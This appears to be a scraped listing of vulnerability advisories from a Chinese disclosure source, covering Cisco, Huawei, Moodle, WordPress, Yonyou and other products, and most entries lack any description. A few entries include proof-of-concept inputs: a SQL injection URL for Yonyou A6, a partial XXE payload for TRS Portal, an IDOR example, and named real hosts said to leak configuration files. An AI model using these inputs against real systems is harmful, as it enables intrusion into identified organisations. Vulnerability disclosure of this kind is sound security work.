Cisco Firepower 9000 Series Switches点击劫持漏洞

No description provided by source...

Moodle拒绝服务漏洞（CNVD-2015-07725）

No description provided by source...

Novell openSUSE dracut程序包符号链接漏洞

No description provided by source...

zTree跨站脚本漏洞

No description provided by source...

Moodle跨站请求伪造漏洞（CNVD-2015-07726）

No description provided by source...

SQLite fts3_tokenizer远程代码执行漏洞

No description provided by source...

Moodle安全绕过漏洞（CNVD-2015-07730）

No description provided by source...

wpa_supplicant拒绝服务漏洞

No description provided by source...

WordPress Neuvoo-Jobroll插件跨站脚本漏洞

漏洞简介： WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。Neuvoo-Jobroll是其中的一个工作机会聚合插件。 WordPress Neuvoo-Jobroll插件中存在跨站脚本漏洞，该漏洞源于程序没有充分过滤用户提交的输入。当用户浏览受影响的网站时，其浏览器将执行攻击者提供的任意脚本代码。这可能导致攻击者窃取基于cookie的身份验证并发起其它攻击。WordPress Neuvoo-Jobroll插件2.0版本中存在漏洞，其他版本也可能受到影响。...

EMC VPLEX GeoSynchrony本地信息泄露漏洞

No description provided by source...

D-Link DIR-615 PING和Send Email缓冲区溢出漏洞

No description provided by source...

多款Huawei eSpace交换机拒绝服务漏洞

No description provided by source...

FreeType 'sfnt/ttcmap.c'堆缓冲区溢出漏洞

No description provided by source...

多款Huawei产品DHCP拒绝服务漏洞

No description provided by source...

GNU a2ps格式化字符串拒绝服务漏洞

No description provided by source...

Cisco Firepower 9000 Series本地拒绝服务漏洞

No description provided by source...

HP Operations Orchestration跨站请求伪造漏洞

No description provided by source...

Cisco Firepower 9000 Series存在多个任意文件读取漏洞

No description provided by source...

Cisco Firepower 9000 Series本地命令注入漏洞

No description provided by source...

IBM Installation Manager /tmp本地命令注入漏洞

No description provided by source...

JosephErnest Void跨站脚本漏洞

No description provided by source...

Huawei eSpace U2980和U2990拒绝服务漏洞

No description provided by source...

Huawei AR路由器目录遍历漏洞

No description provided by source...

Oracle Beehive 'playAudioFile.jsp'远程代码执行漏洞

No description provided by source...

Google AdWords API 'WSDLInterpreter/WSDLInterpreter.php'任意PHP代码执行漏洞

No description provided by source...

latex2rtf格式化字符串拒绝服务漏洞

No description provided by source...

Tibbo Technology AggreGate权限提升漏洞

No description provided by source...

用友致远A6协同办公系统存在一处DBA权限SQL注入漏洞

简要描述： RT 详细说明： 搜索了一下， 没有被提交 漏洞位于：/yyoa/common/js/menu/test.jsp 文件中S1 参数 案例 http://.../yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://.../yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version ...:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version...

Free WMA MP3 Converter缓冲区溢出漏洞

No description provided by source...

Huawei路由器VPN路由转发跳跃漏洞

No description provided by source...

Huawei eSpace统一网关拒绝服务漏洞

No description provided by source...

Cisco Firepower 9000 Firepower Extensible Operating System文件读取漏洞

No description provided by source...

TestLink HTML注入漏洞

No description provided by source...

NXFilter存在多个漏洞

No description provided by source...

D-Link DIR-601命令注入漏洞

No description provided by source...

AlienVault Unified Security Management远程代码执行漏洞

No description provided by source...

Tibbo Technology AggreGate远程代码执行漏洞

No description provided by source...

AlienVault Unified Security Management本地提权漏洞

No description provided by source...

TestLink跨站请求伪造漏洞

No description provided by source...

Newphoria applican框架跨站脚本漏洞

No description provided by source...

多款Huawei路由器信息泄露漏洞

Summary The CF cards on some Huawei switches and ARs contain some sensitive information in plaintext. Once an attacker gets such a CF card, it may result in the leak of sensitive information HWPSIRT-2015-07048. This vulnerability has been assigned Common Vulnerabilities and Exposures CVE ID:...

Spiffy目录遍历漏洞

No description provided by source...

Google AOSP Email for Android开放重定向漏洞

The Google AOSP Email App is vulnerable to HTML Injection on the email body. It allows a remote attacker to be able to send a crafted email with a payload that redirects the user to a target url as soon as he opens the email. This issue is not related with the email provider configured on the app...

Huawei eSpace 8950 IP Phone拒绝服务漏洞

No description provided by source...

AfterLogic WebMail 任意文件包含漏洞

No description provided by source...

WordPress < 4.1.2 Stored XSS vulnerability

No description provided by source...

AfterLogic WebMail settings.xml 信息泄露

No description provided by source...

用友某系统通用漏洞涉及多家银行、证券、能源行业、企业

简要描述： 用友某系统通用漏洞可以读取配置文件 详细说明： 用友某系统通用漏洞涉及多家银行、证券、能源行业、企业 测试了部分网站，还有大量的网站存在此漏洞 http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?rpc=true http://nc.hbny.com.cn:9090/hrss/dorado/smartweb2.RPC.d?rpc=true http://59.173.0.46:8070/hrss/dorado/smartweb2.RPC.d?rpc=true...

悟空crm数据权限控制不当以致绕过访问

简要描述： 权限验证设计不当可以绕过 员工可访问任意其他员工的数据并分享及修改删除操作 详细说明： 用户 mia 并无负责客户也没有被共享客户 通过遍历id 可以访问test用户创建的客户 如 http://crm.demo.5kcrm.com/index.php?m=customer&a=view&id=596&content= 漏洞证明： 用户mia和test无上下级关系 mia可以访问test未分享的客户 mia可以分享该客户给任意员工...

TRS portal个性化门户任意文件读取(二)

简要描述： 发现portal个性化门户其他链接实体注入漏洞 详细说明： TRS Portal个性化门户 http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp链接未对外部实体进行过滤，可调用外部实体进行解析，可任意读取服务器上任意文件 漏洞证明： 漏洞利用过程： http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp POST请求：ObjectXML=%0d%0a%20%20%25remote;%0d%0a%5D%0d%0a...